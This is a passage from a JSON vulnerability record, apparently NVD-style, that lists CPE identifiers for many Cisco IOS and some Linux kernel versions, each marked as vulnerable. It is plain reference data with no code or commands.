                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5c\\)ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)t9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)db2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)db1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3a\\)e8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8a\\)ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ea:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12h\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12i\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12m\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12.02\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxd5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xa1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)bx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ey3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ez:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(23\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ewa3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)b1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(21b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)yd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(7.4\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(7a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2bx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2bw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2jx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yk1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(16.1\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxd4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)s10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17a\\)sxa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xi2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1b\\)da1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)bc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)seb4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)ewa3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(21\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)yw3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)bc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2dx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2eu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zl1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sxe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17d\\)sxb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xu2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)mb13b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)bc1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(22\\)sv1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(27\\)sv1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)seb2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xw1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2cx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2fx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sxe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(12e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(13a\\)bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3\\(3.3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(11c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(11\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(1\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(36\\)cc4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(24c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(11b\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(10\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(17\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(13a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)st7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)sx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(31\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\)xm1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5.1\\)xp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(8\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)e4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xn1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(18.4\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sxd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(13\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(12\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xa5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(15b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)xr6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)xu2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(6d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)tpc11a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xg4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3ye:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yi3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4md:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:1.3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)jk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(1a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(6f\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xg2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xg1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9a\\)bc7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)t5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yy:*:*:*:*:*:*:*",
                "cpe_name": [],
